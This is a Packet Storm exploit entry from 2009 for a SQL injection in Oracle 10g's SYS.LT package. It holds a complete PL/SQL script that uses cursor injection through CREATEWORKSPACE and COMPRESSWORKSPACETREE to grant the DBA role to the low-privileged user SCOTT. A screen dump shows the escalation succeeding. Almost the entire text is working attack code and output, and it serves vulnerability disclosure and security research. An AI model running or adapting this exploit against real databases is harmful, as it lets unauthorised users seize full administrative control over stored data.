Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection

2009-07-02T00:00:00
ID PACKETSTORM:78864
Type packetstorm
Reporter Sumit Siddharth
Modified 2009-07-02T00:00:00

Description

                                        
                                            `This is slightly modified version of: http://milw0rm.com/exploits/7677  
This is based on cursor injection and does not need create function privileges:  
  
DECLARE  
D NUMBER;  
BEGIN  
D := DBMS_SQL.OPEN_CURSOR;  
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);  
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');  
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');  
end;  
  
#-----------screen dump---------------------------------------------------#  
SQL> select * from user_role_privs;  
  
USERNAME GRANTED_ROLE ADM DEF OS_  
------------------------------ ------------------------------ --- --- ---  
SCOTT CONNECT NO YES NO  
SCOTT EXECUTE_CATALOG_ROLE NO YES NO  
SCOTT RESOURCE NO YES NO  
  
SQL> DECLARE  
2 D NUMBER;  
3 BEGIN  
4 D := DBMS_SQL.OPEN_CURSOR;  
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme  
diate ''grant dba to scott'';commit;end;',0);  
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');  
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');  
8 end;  
9  
10  
11 /  
DECLARE  
*  
ERROR at line 1:  
ORA-01403: no data found  
ORA-06512: at "SYS.LT", line 6118  
ORA-06512: at "SYS.LT", line 6087  
ORA-06512: at line 7  
  
  
SQL> select * from user_role_privs;  
  
USERNAME GRANTED_ROLE ADM DEF OS_  
------------------------------ ------------------------------ --- --- ---  
SCOTT CONNECT NO YES NO  
SCOTT DBA NO YES NO  
SCOTT EXECUTE_CATALOG_ROLE NO YES NO  
SCOTT RESOURCE NO YES NO  
  
  
Sid  
www.notsosecure.com  
  
  
`